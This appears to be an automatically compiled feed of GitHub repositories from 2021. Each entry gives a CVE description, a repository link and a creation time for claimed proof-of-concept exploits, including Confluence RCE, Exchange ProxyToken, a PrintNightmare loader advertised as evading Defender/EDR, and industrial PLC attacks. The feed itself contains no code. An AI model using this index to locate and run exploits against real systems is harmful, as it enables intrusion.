**PoC for exploiting CVE-2021-21850 : An exploitable integer overflow vulnerability exists within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input can cause an integer overflow when the library encounters an atom using the “trun” FOURCC code due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21850](https://github.com/AlAIAL90/CVE-2021-21850) create time: 2021-09-01T16:46:20Z

**PoC for exploiting CVE-2021-21849 : An exploitable integer overflow vulnerability exists within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input can cause an integer overflow when the library encounters an atom using the “tfra” FOURCC code due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21849](https://github.com/AlAIAL90/CVE-2021-21849) create time: 2021-09-01T16:46:17Z

**PoC for exploiting CVE-2021-21848 : An exploitable integer overflow vulnerability exists within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. The library will actually reuse the parser for atoms with the “stsz” FOURCC code when parsing atoms that use the “stz2” FOURCC code and can cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21848](https://github.com/AlAIAL90/CVE-2021-21848) create time: 2021-09-01T16:46:14Z

**PoC for exploiting CVE-2021-21842 : An exploitable integer overflow vulnerability exists within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input can cause an integer overflow when processing an atom using the 'ssix' FOURCC code, due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21842](https://github.com/AlAIAL90/CVE-2021-21842) create time: 2021-09-01T16:46:10Z

**PoC for exploiting CVE-2021-21841 : An exploitable integer overflow vulnerability exists within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input when reading an atom using the 'sbgp' FOURCC code can cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21841](https://github.com/AlAIAL90/CVE-2021-21841) create time: 2021-09-01T16:46:05Z

**PoC for exploiting CVE-2021-21840 : An exploitable integer overflow vulnerability exists within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input used to process an atom using the “saio” FOURCC code cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21840](https://github.com/AlAIAL90/CVE-2021-21840) create time: 2021-09-01T16:45:59Z

**PoC for exploiting CVE-2021-21836 : An exploitable integer overflow vulnerability exists within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input using the “ctts” FOURCC code can cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21836](https://github.com/AlAIAL90/CVE-2021-21836) create time: 2021-09-01T16:45:55Z

**PoC for exploiting CVE-2021-21834 : An exploitable integer overflow vulnerability exists within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input when decoding the atom for the “co64” FOURCC can cause an integer overflow due to unchecked arithmetic resulting in a heap-based buffer overflow that causes memory corruption. An attacker can convince a user to open a video to trigger this vulnerability.** : [AlAIAL90/CVE-2021-21834](https://github.com/AlAIAL90/CVE-2021-21834) create time: 2021-09-01T16:45:51Z

**PoC for exploiting CVE-2021-39159 : BinderHub is a kubernetes-based cloud service that allows users to share reproducible interactive computing environments from code repositories. In affected versions a remote code execution vulnerability has been identified in BinderHub, where providing BinderHub with maliciously crafted input could execute code in the BinderHub context, with the potential to egress credentials of the BinderHub deployment, including JupyterHub API tokens, kubernetes service accounts, and docker registry credentials. This may provide the ability to manipulate images and other user created pods in the deployment, with the potential to escalate to the host depending on the underlying kubernetes configuration. Users are advised to update to version 0.2.0-n653. If users are unable to update they may disable the git repo provider by specifying the `BinderHub.repo_providers` as a workaround.** : [AlAIAL90/CVE-2021-39159](https://github.com/AlAIAL90/CVE-2021-39159) create time: 2021-09-01T16:45:44Z

**PoC for exploiting CVE-2021-32995 : Cscape (All Versions prior to 9.90 SP5) lacks proper validation of user-supplied data when parsing project files. This could lead to an out-of-bounds write. An attacker could leverage this vulnerability to execute code in the context of the current process.** : [AlAIAL90/CVE-2021-32995](https://github.com/AlAIAL90/CVE-2021-32995) create time: 2021-09-01T16:45:42Z

**PoC for exploiting CVE-2021-0114 : Insecure default variable initialization for the Intel BSSA DFT feature may allow a privileged user to potentially enable an escalation of privilege via local access.** : [AlAIAL90/CVE-2021-0114](https://github.com/AlAIAL90/CVE-2021-0114) create time: 2021-09-01T16:45:33Z

**PoC for exploiting CVE-2021-33015 : Cscape (All Versions prior to 9.90 SP5) lacks proper validation of user-supplied data when parsing project files. This could lead to an out-of-bounds write via an uninitialized pointer. An attacker could leverage this vulnerability to execute code in the context of the current process.** : [AlAIAL90/CVE-2021-33015](https://github.com/AlAIAL90/CVE-2021-33015) create time: 2021-09-01T16:45:10Z

**PoC for exploiting CVE-2021-31989 : A user with permission to log on to the machine hosting the AXIS Device Manager client could under certain conditions extract a memory dump from the built-in Windows Task Manager application. The memory dump may potentially contain credentials of connected Axis devices.** : [AlAIAL90/CVE-2021-31989](https://github.com/AlAIAL90/CVE-2021-31989) create time: 2021-09-01T16:45:06Z

**PoC for exploiting CVE-2021-36928 : Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36931.** : [AlAIAL90/CVE-2021-36928](https://github.com/AlAIAL90/CVE-2021-36928) create time: 2021-09-01T16:45:00Z

**Reproduce CVE-2020-7471** : [mrlihd/CVE-2020-7471](https://github.com/mrlihd/CVE-2020-7471) create time: 2021-09-01T16:05:56Z

**PoC of CVE-2021-26084 written in Golang based on https://twitter.com/jas502n/status/1433044110277890057?s=20** : [bcdannyboy/CVE-2021-26084_GoPOC](https://github.com/bcdannyboy/CVE-2021-26084_GoPOC) create time: 2021-09-01T16:17:35Z

**CVE-2021-26084 - Confluence Server Webwork OGNL injection (RCE)** : [taythebot/CVE-2021-26084](https://github.com/taythebot/CVE-2021-26084) create time: 2021-09-01T15:19:19Z

**Exploit for Elastix 2.2.0 and FreePBX 2.10.0 based on CVE-2012-4869 vulnerability working on Python3** : [bitc0de/Elastix-Remote-Code-Execution](https://github.com/bitc0de/Elastix-Remote-Code-Execution) create time: 2021-09-01T13:12:01Z

**批量检测** : [tangxiaofeng7/CVE-2021-26084](https://github.com/tangxiaofeng7/CVE-2021-26084) create time: 2021-09-01T12:36:52Z

**CVE-2021-26084 Remote Code Execution on Confluence Servers** : [Osyanina/westone-CVE-2021-26084-scanner](https://github.com/Osyanina/westone-CVE-2021-26084-scanner) create time: 2021-09-01T12:28:41Z

**Remote Code Execution on Confluence Servers : CVE-2021-26084** : [Vulnmachines/Confluence_CVE-2021-26084](https://github.com/Vulnmachines/Confluence_CVE-2021-26084) create time: 2021-09-01T12:19:53Z

**PrintNightMare LPE提权漏洞的CS 反射加载插件。开箱即用、通过内存加载、混淆加载的驱动名称来ByPass Defender/EDR。** : [mstxq17/CVE-2021-1675_RDL_LPE](https://github.com/mstxq17/CVE-2021-1675_RDL_LPE) create time: 2021-09-01T11:25:04Z

**no description** : [qianxiao996/CVE-2021-2222](https://github.com/qianxiao996/CVE-2021-2222) create time: 2021-09-01T11:15:31Z

**CVE-2021-26084 Remote Code Execution on Confluence Servers** : [FanqXu/CVE-2021-26084](https://github.com/FanqXu/CVE-2021-26084) create time: 2021-09-01T09:50:26Z

**Atlassian Confluence Pre-Auth RCE** : [Udyz/CVE-2021-26084](https://github.com/Udyz/CVE-2021-26084) create time: 2021-09-01T08:18:44Z

**CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection 远程代码执行可回显** : [r0ckysec/CVE-2021-26084_Confluence](https://github.com/r0ckysec/CVE-2021-26084_Confluence) create time: 2021-09-01T07:45:55Z

**no description** : [allenenosh/CVE-2021-40352](https://github.com/allenenosh/CVE-2021-40352) create time: 2021-09-01T07:39:27Z

**Exploit example code for CVE-2021-33831** : [lanmarc77/CVE-2021-33831](https://github.com/lanmarc77/CVE-2021-33831) create time: 2021-08-22T14:27:29Z

**Confluence Server Webwork OGNL injection** : [h3v0x/CVE-2021-26084_Confluence](https://github.com/h3v0x/CVE-2021-26084_Confluence) create time: 2021-09-01T07:15:17Z

**CVE-2021-26084 Remote Code Execution on Confluence Servers, reference: https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md** : [JKme/CVE-2021-26084](https://github.com/JKme/CVE-2021-26084) create time: 2021-09-01T02:35:04Z

**CVE-2021-26084 Remote Code Execution on Confluence Servers, reference: https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md** : [gh0stkey/CVE-2021-26084](https://github.com/gh0stkey/CVE-2021-26084) create time: 2021-09-01T02:31:35Z

**no description** : [dinhbaouit/CVE-2021-26084](https://github.com/dinhbaouit/CVE-2021-26084) create time: 2021-09-01T00:50:30Z

**no description** : [alt3kx/CVE-2021-26084_PoC](https://github.com/alt3kx/CVE-2021-26084_PoC) create time: 2021-08-31T23:33:44Z

**ProxyToken: An Authentication Bypass in Microsoft Exchange Server POC exploit** : [bhdresh/CVE-2021-33766-ProxyToken-](https://github.com/bhdresh/CVE-2021-33766-ProxyToken-) create time: 2021-08-31T22:03:13Z

**CVE-2021-40353 openSIS 8.0 SQL Injection Vulnerability** : [5qu1n7/CVE-2021-40353](https://github.com/5qu1n7/CVE-2021-40353) create time: 2021-08-31T21:51:14Z

**Exploit code for CVE-2019-17662** : [MuirlandOracle/CVE-2019-17662](https://github.com/MuirlandOracle/CVE-2019-17662) create time: 2021-08-31T19:30:09Z

**https://www.exploit-db.com/exploits/49757** : [Gr4ykt/CVE-2011-2523](https://github.com/Gr4ykt/CVE-2011-2523) create time: 2021-08-31T17:31:30Z

**Block "itms scheme" / fix CVE-2021-1748** : [tihmstar/itmsBlock](https://github.com/tihmstar/itmsBlock) create time: 2021-08-31T18:06:43Z

**CVE-2021-26084 - Confluence Pre-Auth RCE | OGNL injection** : [carlosevieira/CVE-2021-26084](https://github.com/carlosevieira/CVE-2021-26084) create time: 2021-08-31T16:33:32Z

**Remote Code Execution vulnerability in PHPMailer.** : [RyouYoo/CVE-2016-10033](https://github.com/RyouYoo/CVE-2016-10033) create time: 2021-08-31T13:46:28Z

**no description** : [yamory/CVE-2021-32804](https://github.com/yamory/CVE-2021-32804) create time: 2021-08-31T04:32:38Z

**Strapi <= 3.0.0-beta.17.8 authenticated remote code execution** : [guglia001/CVE-2019-19609](https://github.com/guglia001/CVE-2019-19609) create time: 2021-08-30T03:05:16Z

**no description** : [guglia001/CVE-2019-18818](https://github.com/guglia001/CVE-2019-18818) create time: 2021-08-29T23:30:15Z

**Exploit for CVE-2019-19609 in Strapi (Remote Code Execution)** : [diego-tella/CVE-2019-19609-EXPLOIT](https://github.com/diego-tella/CVE-2019-19609-EXPLOIT) create time: 2021-08-29T17:57:08Z

**Strapi Framework Vulnerable to Remote Code Execution** : [dasithsv/CVE-2019-19609](https://github.com/dasithsv/CVE-2019-19609) create time: 2021-08-29T16:18:27Z

**CVE-2020-25223** : [darrenmartyn/sophucked](https://github.com/darrenmartyn/sophucked) create time: 2021-08-29T11:08:53Z

**Citrix ADC RCE cve-2019-19781** : [Vulnmachines/Ctirix_RCE-CVE-2019-19781](https://github.com/Vulnmachines/Ctirix_RCE-CVE-2019-19781) create time: 2021-08-29T05:22:47Z

**no description** : [BabyTeam1024/CVE-2017-3248](https://github.com/BabyTeam1024/CVE-2017-3248) create time: 2021-08-29T03:24:25Z

**no description** : [BabyTeam1024/CVE-2016-3510](https://github.com/BabyTeam1024/CVE-2016-3510) create time: 2021-08-28T05:15:59Z

**no description** : [dinhbaouit/CVE-2021-36394](https://github.com/dinhbaouit/CVE-2021-36394) create time: 2021-08-28T04:21:44Z

**CVE-2004-2687 DistCC Daemon Command Execution** : [k4miyo/CVE-2004-2687](https://github.com/k4miyo/CVE-2004-2687) create time: 2021-08-28T01:45:22Z

**no description** : [stevenp322/cve-2021-21972](https://github.com/stevenp322/cve-2021-21972) create time: 2021-02-25T18:22:34Z

**no description** : [AssassinUKG/CVE-2021-29447](https://github.com/AssassinUKG/CVE-2021-29447) create time: 2021-08-27T19:20:20Z

**A proof of concept for CVE-2016-6515** : [jptr218/openssh_dos](https://github.com/jptr218/openssh_dos) create time: 2021-08-26T17:44:03Z

**no description** : [madhans23/curl-curl-7_64_1_CVE-2020-8169_noPatch](https://github.com/madhans23/curl-curl-7_64_1_CVE-2020-8169_noPatch) create time: 2021-08-26T05:34:23Z

**no description** : [w16692926717/CVE-2018-8174_EXP](https://github.com/w16692926717/CVE-2018-8174_EXP) create time: 2021-08-26T04:55:43Z

**no description** : [madhans23/curl-curl-7_64_1_CVE-2019-5481_noPatch](https://github.com/madhans23/curl-curl-7_64_1_CVE-2019-5481_noPatch) create time: 2021-08-26T05:17:30Z

**no description** : [security-n/CVE-2021-39379](https://github.com/security-n/CVE-2021-39379) create time: 2021-08-19T04:35:53Z

**no description** : [security-n/CVE-2021-39378](https://github.com/security-n/CVE-2021-39378) create time: 2021-08-19T01:32:49Z

**no description** : [security-n/CVE-2021-39377](https://github.com/security-n/CVE-2021-39377) create time: 2021-08-18T05:29:15Z

**no description** : [W4RCL0UD/CVE-2021-39476](https://github.com/W4RCL0UD/CVE-2021-39476) create time: 2021-08-25T17:37:54Z

**Found multiple XSS vulnerabilities within PhoenixCart 1.0.8.0** : [W4RCL0UD/CVE-2021-39475](https://github.com/W4RCL0UD/CVE-2021-39475) create time: 2021-08-19T18:03:40Z

**Exploit to Virtua Software.** : [LucaRibeiro/CVE-2021-37589](https://github.com/LucaRibeiro/CVE-2021-37589) create time: 2021-07-28T10:27:09Z

**Unauthenticated CSRF Account TakeOver in BigTreeCMS v4.4.14** : [guusec/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver](https://github.com/guusec/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver) create time: 2021-08-21T00:58:38Z

**Exploit script for SAP Business Objects SSRF** : [TheMMMdev/CVE-2020-6308](https://github.com/TheMMMdev/CVE-2020-6308) create time: 2021-08-24T08:36:11Z

**CVE-2020-4464 / CVE-2020-4450** : [silentsignal/WebSphere-WSIF-gadget](https://github.com/silentsignal/WebSphere-WSIF-gadget) create time: 2021-08-17T08:44:49Z

**XSTREAM<=1.4.17漏洞复现(CVE-2021-39141、CVE-2021-39144、CVE-2021-39150)** : [zwjjustdoit/Xstream-1.4.17](https://github.com/zwjjustdoit/Xstream-1.4.17) create time: 2021-08-24T06:15:20Z

**Kibana Prototype Pollution** : [dnr6419/CVE-2019-7609](https://github.com/dnr6419/CVE-2019-7609) create time: 2021-08-24T04:38:26Z

**Automatic Explotation PoC for Polkit CVE-2021-3560** : [aancw/polkit-auto-exploit](https://github.com/aancw/polkit-auto-exploit) create time: 2021-06-11T12:33:56Z

**Remote Code Execution at Rittal** : [asang17/CVE-2021-RCE](https://github.com/asang17/CVE-2021-RCE) create time: 2021-08-04T16:10:05Z

**XSS Vulnerability in Rittal** : [asang17/CVE-2021-XSS](https://github.com/asang17/CVE-2021-XSS) create time: 2021-08-04T16:09:24Z

**no description** : [madhans23/curl-curl-7_64_1_CVE-2019-5482_withPatch](https://github.com/madhans23/curl-curl-7_64_1_CVE-2019-5482_withPatch) create time: 2021-08-23T08:47:39Z

**no description** : [madhans23/curl-curl-7_64_1_CVE-2019-5482_noPatch](https://github.com/madhans23/curl-curl-7_64_1_CVE-2019-5482_noPatch) create time: 2021-08-23T08:28:03Z

**no description** : [artsking/curl-7.64.1_CVE-2020-8284_WithPatch](https://github.com/artsking/curl-7.64.1_CVE-2020-8284_WithPatch) create time: 2021-08-23T03:08:35Z

**my exp for chrome V8 CVE-2021-30551** : [xmzyshypnc/CVE-2021-30551](https://github.com/xmzyshypnc/CVE-2021-30551) create time: 2021-08-22T14:15:23Z

**no description** : [rood8008/CVE-2021-35464](https://github.com/rood8008/CVE-2021-35464) create time: 2021-08-21T22:53:39Z

**An implementation of CVE-2015-3306** : [jptr218/proftpd_bypass](https://github.com/jptr218/proftpd_bypass) create time: 2021-08-21T17:42:05Z

**no description** : [sujithvaddi/apache_struts_cve_2017_9805](https://github.com/sujithvaddi/apache_struts_cve_2017_9805) create time: 2021-08-20T16:49:59Z

**CVE-2021-3441 CVE Check is a python script to search targets for indicators of compromise to CVE-2021-3441** : [tcbutler320/CVE-2021-3441-check](https://github.com/tcbutler320/CVE-2021-3441-check) create time: 2021-01-26T23:23:08Z

**PoC for exploiting CVE-2021-38534 : Certain NETGEAR devices are affected by stored XSS. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6100 before 1.0.0.60, D6200 before 1.1.00.36, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, DM200 before 1.0.0.61, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6220 before 1.1.0.80, R6230 before 1.1.0.80, R6250 before 1.0.4.34, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6700v3 before 1.0.2.62, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7450 before 1.2.0.36, R7900 before 1.0.3.8, R7900P before 1.4.1.50, R8000 before 1.0.4.28, R8000P before 1.4.1.50, R8300 before 1.0.2.130, R8500 before 1.0.2.130, WNDR3400v3 before 1.0.1.24, WNR2020 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, XR450 before 2.3.2.40, and XR500 before 2.3.2.40.** : [AlAIAL90/CVE-2021-38534](https://github.com/AlAIAL90/CVE-2021-38534) create time: 2021-08-20T02:32:45Z

**PoC for exploiting CVE-2021-34640 : The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.4.** : [AlAIAL90/CVE-2021-34640](https://github.com/AlAIAL90/CVE-2021-34640) create time: 2021-08-20T02:32:41Z

**PoC for exploiting CVE-2021-3045 : An OS command argument injection vulnerability in the Palo Alto Networks PAN-OS web interface enables an authenticated administrator to read any arbitrary file from the file system. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.19; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14; PAN-OS 9.1 versions earlier than PAN-OS 9.1.10. PAN-OS 10.0 and later versions are not impacted.** : [AlAIAL90/CVE-2021-3045](https://github.com/AlAIAL90/CVE-2021-3045) create time: 2021-08-20T02:32:33Z

**PoC for exploiting CVE-2013-2763 : ** DISPUTED ** The Schneider Electric M340 PLC modules allow remote attackers to cause a denial of service (resource consumption) via unspecified vectors. NOTE: the vendor reportedly disputes this issue because it "could not be duplicated" and "an attacker could not remotely exploit this observed behavior to deny PLC control functions."** : [AlAIAL90/CVE-2013-2763](https://github.com/AlAIAL90/CVE-2013-2763) create time: 2021-08-20T02:32:25Z

**PoC for exploiting CVE-2013-6276 : ** UNSUPPORTED WHEN ASSIGNED ** QNAP F_VioCard 2312 and F_VioGate 2308 have hardcoded entries in authorized_keys files. NOTE: 1. All active models are not affected. The last affected model was EOL since 2010. 2. The legacy authorization mechanism is no longer adopted in all active models.** : [AlAIAL90/CVE-2013-6276](https://github.com/AlAIAL90/CVE-2013-6276) create time: 2021-08-20T02:29:44Z

**PoC for exploiting CVE-2016-4529 : An unspecified ActiveX control in Schneider Electric SoMachine HVAC Programming Software for M171/M172 Controllers before 2.1.0 allows remote attackers to execute arbitrary code via unknown vectors, related to the INTERFACESAFE_FOR_UNTRUSTED_CALLER (aka safe for scripting) flag.** : [AlAIAL90/CVE-2016-4529](https://github.com/AlAIAL90/CVE-2016-4529) create time: 2021-08-20T02:32:21Z

**PoC for exploiting CVE-2017-6026 : A Use of Insufficiently Random Values issue was discovered in Schneider Electric Modicon PLCs Modicon M241, firmware versions prior to Version 4.0.5.11, and Modicon M251, firmware versions prior to Version 4.0.5.11. The session numbers generated by the web application are lacking randomization and are shared between several users. This may allow a current session to be compromised.** : [AlAIAL90/CVE-2017-6026](https://github.com/AlAIAL90/CVE-2017-6026) create time: 2021-08-20T02:32:17Z

**PoC for exploiting CVE-2017-6030 : A Predictable Value Range from Previous Values issue was discovered in Schneider Electric Modicon PLCs Modicon M221, firmware versions prior to Version 1.5.0.0, Modicon M241, firmware versions prior to Version 4.0.5.11, and Modicon M251, firmware versions prior to Version 4.0.5.11. The affected products generate insufficiently random TCP initial sequence numbers that may allow an attacker to predict the numbers from previous values. This may allow an attacker to spoof or disrupt TCP connections.** : [AlAIAL90/CVE-2017-6030](https://github.com/AlAIAL90/CVE-2017-6030) create time: 2021-08-20T02:32:13Z

**PoC for exploiting CVE-2017-6028 : An Insufficiently Protected Credentials issue was discovered in Schneider Electric Modicon PLCs Modicon M241, all firmware versions, and Modicon M251, all firmware versions. Log-in credentials are sent over the network with Base64 encoding leaving them susceptible to sniffing. Sniffed credentials could then be used to log into the web application.** : [AlAIAL90/CVE-2017-6028](https://github.com/AlAIAL90/CVE-2017-6028) create time: 2021-08-20T02:31:57Z

**PoC for exploiting CVE-2018-7790 : An Information Management Error vulnerability exists in Schneider Electric's Modicon M221 product (all references, all versions prior to firmware V1.6.2.0). The vulnerability allows unauthorized users to replay authentication sequences. If an attacker exploits this vulnerability and connects to a Modicon M221, the attacker can upload the original program from the PLC.** : [AlAIAL90/CVE-2018-7790](https://github.com/AlAIAL90/CVE-2018-7790) create time: 2021-08-20T02:32:09Z

**PoC for exploiting CVE-2018-7789 : An Improper Check for Unusual or Exceptional Conditions vulnerability exists in Schneider Electric's Modicon M221 product (all references, all versions prior to firmware V1.6.2.0). The vulnerability allows unauthorized users to remotely reboot Modicon M221 using crafted programing protocol frames.** : [AlAIAL90/CVE-2018-7789](https://github.com/AlAIAL90/CVE-2018-7789) create time: 2021-08-20T02:32:05Z

**PoC for exploiting CVE-2018-7842 : A CWE-290: Authentication Bypass by Spoofing vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause an elevation of privilege by conducting a brute force attack on Modbus parameters sent to the controller.** : [AlAIAL90/CVE-2018-7842](https://github.com/AlAIAL90/CVE-2018-7842) create time: 2021-08-20T02:32:01Z

**PoC for exploiting CVE-2018-7821 : An Environment (CWE-2) vulnerability exists in SoMachine Basic, all versions, and Modicon M221(all references, all versions prior to firmware V1.10.0.0) which could cause cycle time impact when flooding the M221 ethernet interface while the Ethernet/IP adapter is activated.** : [AlAIAL90/CVE-2018-7821](https://github.com/AlAIAL90/CVE-2018-7821) create time: 2021-08-20T02:31:46Z

**PoC for exploiting CVE-2019-25052 : In Linaro OP-TEE before 3.7.0, by using inconsistent or malformed data, it is possible to call update and final cryptographic functions directly, causing a crash that could leak sensitive information.** : [AlAIAL90/CVE-2019-25052](https://github.com/AlAIAL90/CVE-2019-25052) create time: 2021-08-20T02:32:37Z

**PoC for exploiting CVE-2019-10953 : ABB, Phoenix Contact, Schneider Electric, Siemens, WAGO - Programmable Logic Controllers, multiple versions. Researchers have found some controllers are susceptible to a denial-of-service attack due to a flood of network packets.** : [AlAIAL90/CVE-2019-10953](https://github.com/AlAIAL90/CVE-2019-10953) create time: 2021-08-20T02:32:29Z

**PoC for exploiting CVE-2019-6820 : A CWE-306: Missing Authentication for Critical Function vulnerability exists which could cause a modification of device IP configuration (IP address, network mask and gateway IP address) when a specific Ethernet frame is received in all versions of: Modicon M100, Modicon M200, Modicon M221, ATV IMC drive controller, Modicon M241, Modicon M251, Modicon M258, Modicon LMC058, Modicon LMC078, PacDrive Eco ,PacDrive Pro, PacDrive Pro2** : [AlAIAL90/CVE-2019-6820](https://github.com/AlAIAL90/CVE-2019-6820) create time: 2021-08-20T02:31:53Z

**PoC for exploiting CVE-2020-7524 : Out-of-bounds Write vulnerability exists in Modicon M218 Logic Controller (V5.0.0.7 and prior) which could cause Denial of Service when sending specific crafted IPV4 packet to the controller: Sending a specific IPv4 protocol package to Schneider Electric Modicon M218 Logic Controller can cause IPv4 devices to go down. The device does not work properly and must be powered back on to return to normal.** : [AlAIAL90/CVE-2020-7524](https://github.com/AlAIAL90/CVE-2020-7524) create time: 2021-08-20T02:31:50Z

**PoC for exploiting CVE-2020-7566 : A CWE-334: Small Space of Random Values vulnerability exists in Modicon M221 (all references, all versions) that could allow the attacker to break the encryption keys when the attacker has captured the traffic between EcoStruxure Machine - Basic software and Modicon M221 controller.** : [AlAIAL90/CVE-2020-7566](https://github.com/AlAIAL90/CVE-2020-7566) create time: 2021-08-20T02:31:42Z

**PoC for exploiting CVE-2020-7565 : A CWE-326: Inadequate Encryption Strength vulnerability exists in Modicon M221 (all references, all versions) that could allow the attacker to break the encryption key when the attacker has captured the traffic between EcoStruxure Machine - Basic software and Modicon M221 controller.** : [AlAIAL90/CVE-2020-7565](https://github.com/AlAIAL90/CVE-2020-7565) create time: 2021-08-20T02:31:38Z

**PoC for exploiting CVE-2020-28220 : A CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability exists in Modicon M258 Firmware (All versions prior to V5.0.4.11) and SoMachine/SoMachine Motion software (All versions), that could cause a buffer overflow when the length of a file transferred to the webserver is not verified.** : [AlAIAL90/CVE-2020-28220](https://github.com/AlAIAL90/CVE-2020-28220) create time: 2021-08-20T02:31:34Z

**PoC for exploiting CVE-2020-28214 : A CWE-760: Use of a One-Way Hash with a Predictable Salt vulnerability exists in Modicon M221 (all references, all versions), that could allow an attacker to pre-compute the hash value using dictionary attack technique such as rainbow tables, effectively disabling the protection that an unpredictable salt would provide.** : [AlAIAL90/CVE-2020-28214](https://github.com/AlAIAL90/CVE-2020-28214) create time: 2021-08-20T02:31:29Z

**PoC for exploiting CVE-2020-21564 : An issue was discovered in Pluck CMS 4.7.10-dev2 and 4.7.11. There is a file upload vulnerability that can cause a remote command execution via admin.php?action=files.** : [AlAIAL90/CVE-2020-21564](https://github.com/AlAIAL90/CVE-2020-21564) create time: 2021-08-20T02:30:57Z

**PoC for exploiting CVE-2020-28589 : An improper array index validation vulnerability exists in the LoadObj functionality of tinyobjloader v2.0-rc1 and tinyobjloader development commit 79d4421. A specially crafted file could lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.** : [AlAIAL90/CVE-2020-28589](https://github.com/AlAIAL90/CVE-2020-28589) create time: 2021-08-20T02:30:53Z

**PoC for exploiting CVE-2021-22699 : Improper Input Validation vulnerability exists in Modicon M241/M251 logic controllers firmware prior to V5.1.9.1 that could cause denial of service when specific crafted requests are sent to the controller over HTTP.** : [AlAIAL90/CVE-2021-22699](https://github.com/AlAIAL90/CVE-2021-22699) create time: 2021-08-20T02:31:25Z

**PoC for exploiting CVE-2021-0002 : Improper conditions check in some Intel(R) Ethernet Controllers 800 series Linux drivers before version 1.4.11 may allow an authenticated user to potentially enable information disclosure or denial of service via local access.** : [AlAIAL90/CVE-2021-0002](https://github.com/AlAIAL90/CVE-2021-0002) create time: 2021-08-20T02:31:22Z

**PoC for exploiting CVE-2021-38527 : Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects CBR40 before 2.5.0.14, EX6100v2 before 1.0.1.98, EX6150v2 before 1.0.1.98, EX6250 before 1.0.0.132, EX6400 before 1.0.2.158, EX6400v2 before 1.0.0.132, EX6410 before 1.0.0.132, EX6420 before 1.0.0.132, EX7300 before 1.0.2.158, EX7300v2 before 1.0.0.132, EX7320 before 1.0.0.132, EX7700 before 1.0.0.216, EX8000 before 1.0.1.232, R7800 before 1.0.2.78, RBK12 before 2.6.1.44, RBR10 before 2.6.1.44, RBS10 before 2.6.1.44, RBK20 before 2.6.1.38, RBR20 before 2.6.1.36, RBS20 before 2.6.1.38, RBK40 before 2.6.1.38, RBR40 before 2.6.1.36, RBS40 before 2.6.1.38, RBK50 before 2.6.1.40, RBR50 before 2.6.1.40, RBS50 before 2.6.1.40, RBK752 before 3.2.16.6, RBR750 before 3.2.16.6, RBS750 before 3.2.16.6, RBK852 before 3.2.16.6, RBR850 before 3.2.16.6, RBS850 before 3.2.16.6, RBS40V before 2.6.2.4, RBS50Y before 2.6.1.40, RBW30 before 2.6.2.2, and XR500 before 2.3.2.114.** : [AlAIAL90/CVE-2021-38527](https://github.com/AlAIAL90/CVE-2021-38527) create time: 2021-08-20T02:31:18Z

**PoC for exploiting CVE-2021-33595 : A address bar spoofing vulnerability was discovered in Safe Browser for iOS. Showing the legitimate URL in the address bar while loading the content from other domain. This makes the user believe that the content is served by a legit domain. A remote attacker can leverage this to perform address bar spoofing attack.** : [AlAIAL90/CVE-2021-33595](https://github.com/AlAIAL90/CVE-2021-33595) create time: 2021-08-20T02:31:14Z

